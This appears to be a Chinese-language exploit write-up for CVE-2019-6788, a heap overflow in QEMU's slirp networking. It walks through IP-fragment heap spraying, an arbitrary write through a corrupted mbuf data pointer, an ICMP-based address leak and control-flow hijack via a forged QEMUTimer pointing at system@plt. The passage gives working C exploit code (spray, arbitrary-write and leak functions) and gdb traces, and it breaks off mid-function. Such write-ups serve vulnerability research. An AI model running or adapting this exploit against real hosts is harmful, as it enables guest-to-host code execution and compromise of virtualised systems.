1、跳过IP首部：将消息结构体m的数据指针m_data后移hlen，并将数据长度m_len减去hlen；

2、判断现在IP片段是否是第一个分片包，如果是则调用m_get创建一个消息结构mbuf用于存储分片包，并对其进行相应的初始化设置，随后进入插入流程；

3、在插入流程中，会调用ip_enq函数，将IP片段插入队列中，并更新当前的链表指针。

4、如果在第2步中，不是第一个分片包，则找到当前要插入的位置，然后判断要插入的分片包是否有重复，没有重复的话再进入插入流程。

5、如果接受到了最后一个分片数据包，那么函数会调用m_cat去整合前面接受到的全部分片数据包。

m_get函数创建一个重组队列，如下所示：

/*
 * Get an mbuf from the free list, if there are none
 * allocate one
 *
 * Because fragmentation can occur if we alloc new mbufs and
 * free old mbufs, we mark all mbufs above mbuf_thresh as M_DOFREE,
 * which tells m_free to actually g_free() it
 *
 * The returned mbuf is linked into the used list and reset to empty.
 */
struct mbuf * m_get(Slirp *slirp)
{
	register struct mbuf *m;
	int flags = 0;

	DEBUG_CALL("m_get");

	if (slirp->m_freelist.qh_link == &slirp->m_freelist) {		//the free list is empty
                m = g_malloc(SLIRP_MSIZE);				//so allocate a fresh mbuf of SLIRP_MSIZE bytes
		slirp->mbuf_alloced++;
		if (slirp->mbuf_alloced > MBUF_THRESH)
			flags = M_DOFREE;
		m->slirp = slirp;
	} else {
		m = (struct mbuf *) slirp->m_freelist.qh_link;		//otherwise reuse the first free mbuf
		remque(m);
	}

	/* Insert it in the used list */
	insque(m,&slirp->m_usedlist);												//link it into the used list
	m->m_flags = (flags | M_USEDLIST);

	/* Initialise it */
	m->m_size = SLIRP_MSIZE - offsetof(struct mbuf, m_dat);		//data capacity: total size minus the header
	m->m_data = m->m_dat;
	m->m_len = 0;
        m->m_nextpkt = NULL;
        m->m_prevpkt = NULL;
        m->resolution_requested = false;
        m->expiration_date = (uint64_t)-1;
	DEBUG_ARG("m = %p", m);
	return m;
}

在m_get函数中，可以看到如果在当前空闲链表中找不到空闲的消息结构体对象，则会调用g_malloc分配一个消息对象，大小为SLIRP_MSIZE=0x668。

总结：当收到一个新的IP分片报文（MF=1或分片偏移不为0，且尚无对应的重组队列），且空闲消息链表中没有剩余的空闲消息时，则会调用g_malloc分配一个0x668的消息对象。

那么，这里如果能够不断的去发送含有分片的IP报文，那么就能够在消耗完空闲消息链表后，实现g_malloc分配堆块。

任意地址写

上面，提出了malloc原语的用法。再结合之前堆溢出利用的常见思路，即可以先实现任意地址写。而首先任意地址写需要先找到一个含有写指针的结构体。这里选择的结构体，是我们在前面就已经提及的mbuf：

/*
 * Message buffer: a fixed header followed by an inline data area (m_dat).
 * m_data and m_len locate the current data.
 */
struct mbuf {
	/* XXX should union some of these! */
	/* header at beginning of each mbuf: */
	struct	mbuf *m_next;		/* Linked list of mbufs */
	struct	mbuf *m_prev;
	struct	mbuf *m_nextpkt;	/* Next packet in queue/record */
	struct	mbuf *m_prevpkt;	/* Flags aren't used in the output queue */
	int	m_flags;		/* Misc flags */

	int	m_size;			/* Size of mbuf, from m_dat or m_ext */
	struct	socket *m_so;

	caddr_t	m_data;			/* Current location of data */  //the current data pointer
	int	m_len;			/* Amount of data in this mbuf, from m_data */

	Slirp *slirp;
	bool	resolution_requested;
	uint64_t expiration_date;
	char   *m_ext;
	/* start of dynamic buffer area, must be last element */
	char    m_dat[];
};

在mbuf中，可以看到有数据指针m_data以及长度m_len，符合要求。然后我们再去寻找一处能够对该指针进行写入的路径。如果能稳定控制该路径，那么我们通过堆溢出修改该结构体指针就有可能实现任意写。

这里对m_data写入的路径其实有很多，这里原作者选择的路径是前面提到ip在接受到最后一个分片数据包时会调用m_cat对所有分片数据包进行整合：

/*
 * Copy data from one mbuf to the end of
 * the other.. if result is too big for one mbuf, allocate
 * an M_EXT data segment
 *
 * n is freed after its data has been copied.
 */
void m_cat(struct mbuf *m, struct mbuf *n)
{
	/*
	 * If there's no room, realloc
	 */
	if (M_FREEROOM(m) < n->m_len)
		m_inc(m, m->m_len + n->m_len);

	/* Append n's bytes directly after m's current data. */
	memcpy(m->m_data+m->m_len, n->m_data, n->m_len);
	m->m_len += n->m_len;

	m_free(n);
}

/* make m 'size' bytes large from m_data */
void m_inc(struct mbuf *m, int size)
{
    int gapsize;

    /* some compilers throw up on gotos.  This one we can fake. */
    /* NOTE(review): M_ROOM is defined elsewhere; presumably the room
     * available from m_data - confirm. Nothing to do if it exceeds size. */
    if (M_ROOM(m) > size) {
        return;
    }

    if (m->m_flags & M_EXT) {
        /* Data already lives in m_ext: grow that buffer with g_realloc. */
        gapsize = m->m_data - m->m_ext;
        m->m_ext = g_realloc(m->m_ext, size + gapsize);
    } else {
        /* First growth: allocate m_ext and copy the inline m_dat area over. */
        gapsize = m->m_data - m->m_dat;
        m->m_ext = g_malloc(size + gapsize);
        memcpy(m->m_ext, m->m_dat, m->m_size);
        m->m_flags |= M_EXT;
    }

    /* Keep m_data at the same offset (gapsize) inside the new buffer. */
    m->m_data = m->m_ext + gapsize;
    m->m_size = size + gapsize;
}

在m_cat中实现了将所有分片数据包整合到一个堆块的功能：

1、首先通过M_FREEROOM(m)检查当前m的剩余空间能否存储n消息，如果不能则调用m_inc，由其通过g_realloc或者g_malloc增大当前m的缓冲区大小；

2、如果大小满足，则会调用memcpy(m->m_data+m->m_len, n->m_data, n->m_len)，将当前n->m_data的数据拷贝到m->m_data+m->m_len处。

这里的m和n都是m_buf结构体。如果我们可以通过堆溢出覆盖m->m_data、m->m_len和n->m_data，那么就能够向任意地址写入任意值。这里的m是分片链表的头节点，n是其中的分片数据包。

接下来，我们将堆溢出与这个任意地址写整合一下，梳理一下任意地址写真正的执行流程：

1、先利用提到的malloc原语，堆喷到能分配top chunk；

2、然后重新建立一个新的socket连接，此时会重新分配一个socket对象，也即会重新分配一个可能触发堆溢出的so_rcv堆块结构；

3、随后，发送一个DF=0&MF=1的IP分片包，此时会从top chunk中分配一个m_buf存储该堆块m1，且该堆块在so_rcv之下；

4、然后，使用同一个socket向113端口发送一个EMU_IDENT协议数据包，此时就会进入堆溢出流程，使用堆溢出修改m1->m_data；

5、然后，发送一个DF=0&MF=0的IP分片包，会分配一个新的m_buf结构体m2，那么就会进入堆合并的流程。会从m2->m_data处拷贝数据到m1->m_data处，实现任意地址写。

泄漏地址

网络协议的洞想要泄漏地址，那么肯定需要找到一个能够发送返回包的路径，并且在返回数据中夹带我们需要的脏数据来实现地址泄漏。

这里原作者选择的是icmp返回包，原因其实很简单就是icmp包与tcp协议独立，且处理逻辑相对简单。

/*
 * Process a received ICMP message.
 */
void
icmp_input(struct mbuf *m, int hlen)
{
  register struct icmp *icp;
  register struct ip *ip=mtod(m, struct ip *);
  int icmplen=ip->ip_len;
  Slirp *slirp = m->slirp;

  DEBUG_CALL("icmp_input");
  DEBUG_ARG("m = %p", m);
  DEBUG_ARG("m_len = %d", m->m_len);

  /*
   * Locate icmp structure in mbuf, and check
   * that its not corrupted and of at least minimum length.
   */
  if (icmplen < ICMP_MINLEN) {          /* min 8 bytes payload */
  freeit:
    m_free(m);
    goto end_error;
  }

  m->m_len -= hlen;
  m->m_data += hlen;
  icp = mtod(m, struct icmp *);		//获取icmp协议数据包
  if (cksum(m, icmplen)) {			//检查校验值
    goto freeit;
  }
  m->m_len += hlen;
  m->m_data -= hlen;

  DEBUG_ARG("icmp_type = %d", icp->icmp_type);
  switch (icp->icmp_type) {
  case ICMP_ECHO:										//icmp echo类型
    ip->ip_len += hlen;	             /* since ip_input subtracts this */
    if (ip->ip_dst.s_addr == slirp->vhost_addr.s_addr ||
        ip->ip_dst.s_addr == slirp->vnameserver_addr.s_addr) {
        icmp_reflect(m);						//调用icmp_reflect返回数据包，参数为m，类型为m_buf结构体
    } else if (slirp->restricted) {
        goto freeit;
    } else {
      struct socket *so;
      struct sockaddr_storage addr;
      so = socreate(slirp);
      if (icmp_send(so, m, hlen) == 0) {
        return;
      }
			...

  default:
    m_free(m);
  } /* swith */

end_error:
  /* m is m_free()'d xor put in a socket xor or given to ip_send */
  return;
}

从icmp_input函数中可以看到，在处理icmp echo数据包时，会直接调用icmp_reflect返回数据包，而返回的数据包文为之前ip_input传入的消息结构体m。所以如果能够将m->m_data数据指针指向一个伪造的icmp返回数据，那么就能在返回时泄漏我们伪造地址的相关数据了。

劫持控制流

劫持控制流的方法这里还是使用QemuTimer，在bss有个全局变量main_loop_tlg，类型为QEMUTimerListGroup（其中保存的是QEMUTimerList*指针），QEMUTimerList的成员active_timers为QEMUTimer*类型，我们在堆上伪造这两个结构体，覆写bss的全局变量，伪造cb为system@plt，opaque为参数地址，当expire_time过完就会触发命令执行。

.bss:00000000012C3900 main_loop_tlg   QEMUTimerListGroup_0 <?>
.bss:00000000012C3900                                         ; DATA XREF: qemu_clock_init+28↑o
.bss:00000000012C3900                                         ; qemu_clock_init+C0↑o ...
.bss:00000000012C3920 ; QEMUClock_0 qemu_clocks[4]
.bss:00000000012C3920 qemu_clocks     QEMUClock_0 4 dup(<?>)  ; DATA XREF: qemu_clock_ptr+11↑o
.bss:00000000012C39A0 ; AioContext_0 *qemu_aio_context

// util/qemu-timer.c
/* A timer list: active_timers points to a QEMUTimer, and notify_cb/notify_opaque hold a callback and its argument. */
struct QEMUTimerList {
    QEMUClock *clock;
    QemuMutex active_timers_lock;
    QEMUTimer *active_timers;
    QLIST_ENTRY(QEMUTimerList) list;
    QEMUTimerListNotifyCB *notify_cb;
    void *notify_opaque;

    /* lightweight method to mark the end of timerlist's running */
    QemuEvent timers_done_ev;
};

// include/qemu/timer.h
/*
 * A single timer, quoted from QEMU's include/qemu/timer.h. The write-up
 * forges cb and opaque so that the callback becomes system@plt with an
 * attacker-chosen argument.
 */
struct QEMUTimer {
    int64_t expire_time;        /* in nanoseconds */
    QEMUTimerList *timer_list;
    QEMUTimerCB *cb;  // callback function pointer
    void *opaque;     // argument associated with the callback
    QEMUTimer *next;
    int attributes;
    int scale;
};

漏洞调试

上面已经讲述了漏洞利用的相关方法，这里对漏洞关键点进行调试分析。

任意地址写

   0x55be99d790ff <tcp_emu+176>    mov    rcx, qword ptr [rax + 0x30]                   
   0x55be99d79103 <tcp_emu+180>    mov    rax, qword ptr [rbp - 0x138]                  
   0x55be99d7910a <tcp_emu+187>    mov    rax, qword ptr [rax + 8]                      
   0x55be99d7910e <tcp_emu+191>    mov    rsi, rcx                                      
   0x55be99d79111 <tcp_emu+194>    mov    rdi, rax                                      
 ► 0x55be99d79114 <tcp_emu+197>    call   memcpy@plt                <memcpy@plt>        
        dest: 0x7ff9847c5a00 ◂— 0x0                                                     
        src: 0x7ff9847c67a4 ◂— 0x0                                                      
        n: 0x43                                                                         
                                                                                        
   0x55be99d79119 <tcp_emu+202>    mov    rax, qword ptr [rbp - 0x138]                  
   0x55be99d79120 <tcp_emu+209>    mov    rdx, qword ptr [rax + 8]                      
   0x55be99d79124 <tcp_emu+213>    mov    rax, qword ptr [rbp - 0x190]                  
   0x55be99d7912b <tcp_emu+220>    mov    eax, dword ptr [rax + 0x38]                   
   0x55be99d7912e <tcp_emu+223>    cdqe                                                 
───────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────
In file: /home/alex/qemu/cve-2019-6788/qemu/slirp/tcp_subr.c                            
   633                  struct socket *tmpso;                                           
   634                  struct sockaddr_in addr;                                        
   635                  socklen_t addrlen = sizeof(struct sockaddr_in);                 
   636                  struct sbuf *so_rcv = &so->so_rcv;                              
   637                                                                                  
 ► 638                  memcpy(so_rcv->sb_wptr, m->m_data, m->m_len);                   
   639                  so_rcv->sb_wptr += m->m_len;                                    
   640                  so_rcv->sb_rptr += m->m_len;
   641                  m->m_data[m->m_len] = 0; /* NULL terminate */
   642                  if (strchr(m->m_data, '\r') || strchr(m->m_data, '\n')) {
   643                          if (sscanf(so_rcv->sb_data, "%u%*[ ,]%u", &n1, &n2) == 2
) {

gdb-peda$ p/a *(struct mbuf*)0x7ff9847c5a10  
$2 = {
  m_next = 0x7ff9847c3160,
  m_prev = 0x7ff9847c6080,
  m_nextpkt = 0x0,
  m_prevpkt = 0x0,
  m_flags = 0xc,
  m_size = 0x608,
  m_so = 0x0,
  m_data = 0x7ff9847c5ab0,
  m_len = 0x307,
  slirp = 0x55be9ba9ed60,
  resolution_requested = 0x0,
  expiration_date = 0xffffffffffffffff,
  m_ext = 0x0,
  m_dat = 0x7ff9847c5a70
}
gdb-peda$ p/a *(struct mbuf*)0x7ff9847c5a10
$3 = {
  m_next = 0x0,
  m_prev = 0x0,
  m_nextpkt = 0x0,
  m_prevpkt = 0x0,
  m_flags = 0x0,
  m_size = 0x608,
  m_so = 0x0,
  m_data = 0x7ff984000b00,	//fake_icmp_response_data
  m_len = 0x307,
  slirp = 0x55be9ba9ed60,
  resolution_requested = 0x0,
  expiration_date = 0xffffffffffffffff,
  m_ext = 0x0,
  m_dat = 0x7ff9847c5a70
}

对比溢出前后同一个mbuf(0x7ff9847c5a10)的两次输出，可以看到通过堆溢出已经将m_data修改为指定地址。

ping recv:                                                                
  0000  52 55 0a 00 02 02 52 54 00 12 34 56 08 00 45 00  RU....RT..4V..E. 
  0010  00 28 de ad 00 63 ff 01 de c1 7f 00 00 01 7f 00  .(...c.......... 
  0020  00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................ 
  0030  00 00 00 00 00 00                                ......           
leak:339(): recv count 1                                                  
leak:355(): 167.205 ms (846 bytes received)                               
ping recv:                                                                
  0000  52 54 00 12 34 56 52 55 0a 00 02 02 08 00 45 00  RT..4VRU......E. 
  0010  00 1c 00 1b 00 00 ff 01 a3 b5 0a 00 02 02 0a 00  ................ 
  0020  02 0f 00 00 fc 17 03 e8 00 00 2f 75 73 72 2f 62  ........../usr/b 
  0030  69 6e 2f 78 63 61 6c 63 00 00 00 00 00 00 00 00  in/xcalc........ 
  0040  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................ 
  0050  00 6d f3 ca ec e3 b4 0f 80 3c 42 fa 5e 55 00 00  .m.......<B.^U.. 
  0060  00 00 00 00 00 00 00 00 00 00 e0 fe 00 00 00 00  ................ 
  0070  00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00  ................ 
  0080  00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00  ................ 
  0090  00 6d f3 ca ec e3 b4 0f 00 00 00 00 00 00 00 00  .m.............. 
  00a0  45 01 00 00 00 00 00 00 68 37 90 f9 5e 55 00 00  E.......h7..^U.. 
  00b0  00 71 1f 60 ba 7f 00 00 00 00 00 00 00 00 00 00  .q.`............ 
  00c0  90 da 1f 60 ba 7f 00 00 00 00 00 00 00 00 00 00  ...`............ 
  00d0  50 68 47 fa 5e 55 00 00 00 00 00 00 00 00 00 00  PhG.^U.......... 
  00e0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................ 
  00f0  00 0f 00 60 ba 7f 00 00 00 00 00 00 00 00 00 00  ...`............ 
  0100  00 20 bd d8 b9 7f 00 00 00 10 10 00 00 00 00 00  . .............. 
  0110  f0 2f cd d8 b9 7f 00 00 0d 21 f6 ab 14 5e b8 89  ./.......!...^.. 
  0120  ae 18 2c 4d fd 7f 00 00 af 18 2c 4d fd 7f 00 00  ..,M......,M.... 
  0130  70 19 2c 4d fd 7f 00 00 00 5c 0b 6b ba 7f 00 00  p.,M.....\.k.... 
  0140  0d 21 b6 aa 14 5e b8 89 0d 21 32 b4 b3 1c 76 dc  .!...^...!2...v.

在返回报文中可以明显看到heap和text地址

EXP

堆喷

堆喷的方法其实就是反复利用上面提到的malloc原语来不断分配堆块。难点在于组装IP和TCP协议报文头，这里需要将IP头中的MF(More Fragments)分片标志位置为1。

void spray_chunk(int size, uint16_t ip_id){
    int sock;
    uint8_t *packet;
    char* interface1, *src_ip, *dst_ip;
    struct ifreq ifr;
    struct ip iphdr;
    int * ip_flags, *tcp_flags;
    char* payload;
    int payloadlen;
    int status;
    struct tcphdr tcphdr;
    int i = 0;
    struct sockaddr_in sin;
    const int on = 1;

    packet = alloc_uint(IP_MAXPACKET);
    interface1 = alloc_char(40);
    src_ip = alloc_char(INET_ADDRSTRLEN);
    dst_ip = alloc_char(INET_ADDRSTRLEN);
    ip_flags = alloc_int(4);
    tcp_flags = alloc_int(8);
    payload = alloc_char(IP_MAXPACKET);

    payloadlen = size - 84;

    //Interface to send packet through
 		//拷贝网卡名称
    strcpy(interface1, interface);

    //Submit request for a socket descriptor to look up interface
    if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW))<0){
        Err("socket() failed to get sock descriptor for using ioctl()");
        exit(EXIT_FAILURE);
    }

    //use ioctl() to look up interface index which we will use to 
    //bind socket descriptor sd to specified interface with setsockopt() since
    //none of the other arguments of sendto() specify which interface to use
    memset(&ifr, 0, sizeof(ifr));
    snprintf(ifr.ifr_name, sizeof(ifr.ifr_name), "%s", interface1);
    //printf("sock iotcl begin\n");
    if(ioctl(sock, SIOCGIFINDEX, &ifr) < 0){
        Err("ioctl() failed to find interface");
        exit(EXIT_FAILURE);
    }
    close(sock);
    
    //source IPV4 address: you need to fill this out
    strcpy(src_ip, "127.0.0.1");
    strcpy(dst_ip, "127.0.0.1");

    //IPV4 header
    //IPv4 header length (4 bits): Number of 32-bit words in header = 5
    iphdr.ip_hl = IP4_HDRLEN /sizeof(uint32_t);
    //Internet Protocol version (4 bits): IPv4
    iphdr.ip_v = 4;
    //Type of service (8 bits)
    iphdr.ip_tos = 0;
    //Total length of datagram (16 bits): IP header + TCP header + TCP data
    iphdr.ip_len = htons(IP4_HDRLEN + TCP_HDRLEN + payloadlen);
    //ID sequence number (16 bits): unused, since single datagram
    iphdr.ip_id = htons(ip_id);
    //Flags, and Fragmentation offset (3, 13 bits): 0 since single datagram
    // Zero (1 bit)
    ip_flags[0] = 0;
    //Do not fragment flag (1 bit)
    //选择需要分片
    ip_flags[1] = 0;
    //More fragments following flag (1 bit)
    ip_flags[2] = 1;		//置1
    // Fragmentation offset (13 bit)
    ip_flags[3] = 0;

    iphdr.ip_off = htons((ip_flags[0] << 15) + (ip_flags[1] << 14) +
                    (ip_flags[2] << 13) + ip_flags[3]);
    //Time-to-live (8 bits): default to maximum value
    iphdr.ip_ttl = 225;
    //Transport layer protocol (8 bits): 6 for TCP
    iphdr.ip_p = IPPROTO_TCP;		//TCP协议

    //source IPv4 address (32 bits)
    if((status = inet_pton(AF_INET, src_ip, &(iphdr.ip_src))) != 1){
        printf("inet_pton() failed\n Error message: %s\n", strerror(status));
        exit(EXIT_FAILURE);
    }

    //Destination IPv4 address (32 bits)
    if((status = inet_pton(AF_INET, dst_ip, &(iphdr.ip_dst))) != 1){
        printf("inet_pton() failed\n Error message: %s\n", strerror(status));
        exit(EXIT_FAILURE);
    }

    //IPv4 header checksum (16 bits): set to 0 when calculating checksum
    iphdr.ip_sum = 0;
    iphdr.ip_sum = csum((uint16_t *)&iphdr, IP4_HDRLEN);

    //TCP header
    //Source port number (16 bits)
    tcphdr.th_sport = htons(60);
    //Destination port number (16 bits)
    tcphdr.th_dport = htons(80);
    //Sequence number (32 bits)
    tcphdr.th_seq = htonl(0);
    //Acknowledgement number (32 bits)
    tcphdr.th_ack = htonl(0);
    //Reserved (4 bits): should be 0
    tcphdr.th_x2 = 0;
    //Data offset (4 bits): size of TCP header in 32-bit words
    tcphdr.th_off = TCP_HDRLEN / 4;

    //Flags (8 bits)
    //FIN flag (1 bit)
    tcp_flags[0] = 0;
    //SYN flag (1 bit)
    tcp_flags[1] = 0;
    //RST flag (1 bit)
    tcp_flags[2] = 0;
    //PSH flag (1 bit)
    tcp_flags[3] = 1;
    //ACK flag (1 bit)
    tcp_flags[4] = 1;
    // URG flag (1 bit)
    tcp_flags[5] = 0;
    //ECE flag (1 bit)
    tcp_flags[6] = 0;
    //CWR flag (1 bit)
    tcp_flags[7] = 0;
    tcphdr.th_flags = 0;
    for(i=0; i<8; i++){
        tcphdr.th_flags += (tcp_flags[i] << i);
    }

    //window size (16 bits)
    tcphdr.th_win = htons(65535);
    //Urgent pointer (16 bits): 0 (only valid of URG flag is set)
    tcphdr.th_urp = htons(0);
    //TCP checksum (16 bits)
    tcphdr.th_sum = tcp4_checksum(iphdr, tcphdr, (uint8_t *)payload, payloadlen);

    //prepare packet
    //First part is an IPv4 header
    memcpy(packet, &iphdr, IP4_HDRLEN*sizeof(uint8_t));
    //Next part of packet is upper layer protocol header
    memcpy((packet+IP4_HDRLEN), &tcphdr, TCP_HDRLEN*sizeof(uint8_t));
    //Last part is upper layer protocol data
    memcpy((packet+IP4_HDRLEN+TCP_HDRLEN), payload, payloadlen*sizeof(uint8_t));

    //The kernel os going to prepare layer 2 information (ethernet frame header) for us
    //For that, we need to specify a destination for the kernel in order for it to decide
    //where to send the raw datagram. we fill in a struct in_addr with the desired destination IP address
    //and pass this structure to the sendto() function
    memset(&sin, 0, sizeof(struct sockaddr_in));
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = iphdr.ip_dst.s_addr;

    //submit request for a raw socket descriptor
    if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
        Err("socket failed");
        exit(EXIT_FAILURE);
    }

    //ser flag so socket expects us to provide IPv4 header
    if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) <0){
        Err("setsockopt() failed to set IP_HDRINCL");
        exit(EXIT_FAILURE);
    }

    //Bind socket to interface index
    if(setsockopt(sock, SOL_SOCKET, SO_BINDTODEVICE, &ifr, sizeof(ifr)) <0){
        Err("setsockopt() failed to bind to interface");
        exit(EXIT_FAILURE);
    }

    //send packet
    if(sendto(sock, packet, IP4_HDRLEN+TCP_HDRLEN+payloadlen, 0, 
                (struct sockaddr *)&sin, sizeof(struct sockaddr)) <0){
        Err("sendto() failed");
        exit(EXIT_FAILURE);
    }

    //closed socket descriptor
    close(sock);
    //Free allocated memory
    free(packet);
    free(interface1);
    free(src_ip);
    free(dst_ip);
    free(ip_flags);
    free(tcp_flags);
    free(payload);
}

任意地址写

先通过堆喷保证后续的堆布局是紧邻的。然后创建一个socket连接s，在connect时即会创建socket结构体，也就是会分配so->so_rcv缓冲区。紧接着发送一个MF标志位为1的IP分片数据包，此时会为该包数据分配一个mbuf结构体mbuf1，其会紧邻在so->so_rcv之后。然后通过write(s)不断触发堆溢出，修改mbuf1->m_data为target_addr。最后发送一个ip_id相同、MF标志位为0的最后一个分片，此时会进行分片重组，执行memcpy(target_addr, data, data_len)，实现任意地址写。

/*
 * Arbitrary-write primitive built on the so_rcv heap overflow.
 *
 * Steps, in the order the heap layout requires:
 *   1. spray the heap with spray_chunk();
 *   2. connect to port 113 so that the socket's so_rcv buffer is allocated;
 *   3. send a first IP fragment (MF = 1) whose mbuf should land right after
 *      so_rcv;
 *   4. write() enough data to overflow so_rcv into that mbuf and replace the
 *      low addr_len bytes of its m_data with addr;
 *   5. send the last fragment (MF = 0) so that reassembly copies write_data
 *      to the redirected m_data.
 *
 * addr           - value written over m_data (low byte first)
 * addr_len       - how many low-order bytes of addr to write, at most 8
 * write_data     - bytes carried by the final fragment
 * write_data_len - length of write_data
 * spray_times    - number of 0x2000-sized spray packets sent first
 *
 * Failures of malloc/socket/connect/write are fatal through Err().
 */
void arbitray_write(uint64_t addr, int addr_len, uint8_t* write_data,
                    int write_data_len, int spray_times){
    int s, len, i;
    struct sockaddr_in ip_addr;
    int ret;
    struct ip_pkt_info pkt_info;

    uint8_t *payload = (uint8_t*)malloc(IP_MAXPACKET);
    uint8_t *payload_start = payload;
    uint32_t *payload32 = (uint32_t*)payload;
    uint64_t *payload64 = (uint64_t*)payload;

    if(payload == NULL){
        Err("malloc in arbitray_write");
    }

    /* Filler must be a character constant: passing the string "a" would use
     * an arbitrary byte of the literal's address, possibly '\r' or '\n'. */
    memset(payload, 'a', 0x1000);
    memcpy(payload, "A1ex", 4);

    printf("[+] spray chunk \n");
    for(i=0; i<spray_times; i++){
        printf("spray 0x2000 chunk, id: %d\n", i);
        spray_chunk(0x2000, spray_ip_id+i);
    }
    printf("spray finished\n");

    s = socket(AF_INET, SOCK_STREAM, 0);
    if(s < 0){
        Err("socket in arbitray_write");
    }
    memset(&ip_addr, 0, sizeof(ip_addr));
    ip_addr.sin_family = AF_INET;
    ip_addr.sin_addr.s_addr = inet_addr(host);
    ip_addr.sin_port = htons(113);  // Identification protocol port
    len = sizeof(struct sockaddr_in);
    printf("connect so_srv malloc\n");
    // connecting makes the peer allocate the so_rcv buffer
    ret = connect(s, (struct sockaddr*)&ip_addr, len);
    if(ret == -1){
        Err("connect in arbitray_write");
    }
    pkt_info.ip_id = 0xdead;
    pkt_info.ip_p = 0xff;
    pkt_info.ip_off = 0;
    pkt_info.MF = 1;        // more fragments follow
    printf("malloc mbuf 1\n");
    // first fragment: its mbuf is expected to sit right behind so_rcv
    send_ip_pkt(&pkt_info, payload, 0x300+4);
    printf("[+] Now we finished the malloc of so_rcv and the mbuf\n");

    // fill so_rcv up to the chunk that follows it
    for(i=0; i<6; ++i){
        if(write(s, payload, 0x500) < 0){
            Err("write in arbitray_write");
        }
        printf("send %d complete\n", i+1);
    }
    if(write(s, payload, 1072) < 0){
        Err("write in arbitray_write");
    }

    // actual overflow: forged chunk header followed by the mbuf fields
    *payload64++ = 0;
    *payload64++ = 0x675;   // chunk header
    *payload64++ = 0;       // m_next
    *payload64++ = 0;       // m_prev
    *payload64++ = 0;       // m_nextpkt
    *payload64++ = 0;       // m_prevpkt
    payload32 = (uint32_t *)payload64;
    *payload32++ = 0;       // m_flags
    *payload32++ = 0x608;   // m_size
    payload64 = (uint64_t *)payload32;
    *payload64++ = 0;       // m_so
    payload = (uint8_t *)payload64;
    assert(addr_len <= 8);
    for(i=0; i<addr_len; ++i){
        *payload++ = (addr>> (i*8)) & 0xff; // m_data
    }
    // overwrite m_data with the target address
    if(write(s, payload_start, (uint8_t *)payload - payload_start) < 0){
        Err("write in arbitray_write");
    }

    printf("[+]Now we have written faked mbuf struct\n");
    if(stop_flag){
        puts("trigger!");
        getchar();
    }
    pkt_info.ip_id = 0xdead;
    pkt_info.ip_off = 0x300 + 24;
    pkt_info.MF = 0;        // last fragment
    pkt_info.ip_p = 0xff;
    // final fragment: triggers reassembly and therefore the write
    send_ip_pkt(&pkt_info, write_data, write_data_len);
    printf("[+]Now we have trigger the written to target addr\n");

    close(s);
    free(payload_start);
}

泄漏地址

首先利用与任意地址写相同的方法，将mbuf的m_data的低位改写为0x0b00，然后通过分片重组向该地址写入伪造的ICMP数据。随后创建一个原始套接字(recvsd)接收ICMP的返回报文，此时在多余的脏数据中就可以得到heap地址和qemu(text段)地址。但是这里泄漏出的qemu地址的第4位和第5位不固定，这也导致exp不一定每次都能成功。

/*
 * Information leak: redirect a queued mbuf's m_data with the so_rcv overflow,
 * complete the fragmented ICMP datagram and read text/heap pointers out of
 * the ICMP echo reply that comes back.
 *
 * addr     - value whose low bytes are written over m_data
 * addr_len - number of low-order bytes of addr to write, at most 8
 *
 * On success the globals text_base and heap_base are set. The function exits
 * the process if connect() fails or no reply arrives within the timeout.
 *
 * NOTE(review): this excerpt uses spray(), g_spray_ip_id, dbg_printf() and a
 * three-argument hexdump(), while the rest of the write-up shows
 * spray_chunk(), spray_ip_id and a two-argument hexdump() - confirm which set
 * of helpers the final exploit really provides.
 */
void leak(uint64_t addr, int addr_len) {
    int s, len, i, recvsd;
    struct sockaddr_in ip_addr;
    int ret;
    struct ip_pkt_info pkt_info;

    uint8_t *payload = (uint8_t *)malloc(IP_MAXPACKET);
    uint8_t *payload_start = payload;
    uint32_t *payload32 = (uint32_t *)payload;
    uint64_t *payload64 = (uint64_t *)payload;

    memset(payload, 'A', 0x1000);
    memcpy(payload, "ama2in9", 7);

    dbg_printf("in leak_text...\n");
    for (i = 0; i < 0x20; ++i) {
        dbg_printf("spraying size 0x2000, id: %d\n", i);
        spray(0x2000, g_spray_ip_id + i);
    }
    dbg_printf("spray finished.\n");
    // getchar();

    s = socket(AF_INET, SOCK_STREAM, 0);
    ip_addr.sin_family = AF_INET;
    ip_addr.sin_addr.s_addr = inet_addr(host);
    ip_addr.sin_port = htons(113); // vulnerable port
    len = sizeof(struct sockaddr_in);
    ret = connect(s, (struct sockaddr *)&ip_addr, len);
    if (ret == -1) {
        perror("0ops: client");
        exit(1);
    }

    pkt_info.ip_id = 0xdead;
    pkt_info.ip_off = 0;
    pkt_info.MF = 1;
    pkt_info.ip_p = IPPROTO_ICMP;
    send_ip_pkt(&pkt_info, payload, 0x300 + 4); // this packet ends up right behind so_rcv

    /*
        let's overflow here!
        send(xxx)
    */
    for (i = 0; i < 6; ++i) {
        write(s, payload, 0x500); 
                                  
        dbg_printf("send %d complete\n", i + 1);
    }
    write(s, payload, 1072);

    // actual overflow here
    *payload64++ = 0;
    *payload64++ = 0x675; // chunk header
    *payload64++ = 0;     // m_next
    *payload64++ = 0;     // m_prev
    *payload64++ = 0;     // m_nextpkt
    *payload64++ = 0;     // m_prevpkt
    payload32 = (uint32_t *)payload64;
    *payload32++ = 0;     // m_flags
    *payload32++ = 0x608; // m_size
    payload64 = (uint64_t *)payload32;
    *payload64++ = 0; // m_so
    payload = (uint8_t *)payload64;
    assert(addr_len <= 8);
    for (i = 0; i < addr_len; ++i) {
        *payload++ = (addr >> (i * 8)) & 0xff; // m_data
    }
    // overwrite the low addr_len bytes of m_data (0xb00 according to the write-up)
    write(s, payload_start, (uint8_t *)payload - payload_start);
    printf("[+]leaking: Now we have finished faking m_data.\n");
    //getchar();
    // write(s, payload, 0x1000);
    dbg_printf("trigger reass!");
    // getchar();
    // note: payload now points just past the forged m_data bytes, not at payload_start
    memset(payload, 'A', 0x1000);
    memcpy(payload, "a1exxx", 6);
    pkt_info.ip_id = 0xdead;
    pkt_info.ip_off = 0x300 + 24;
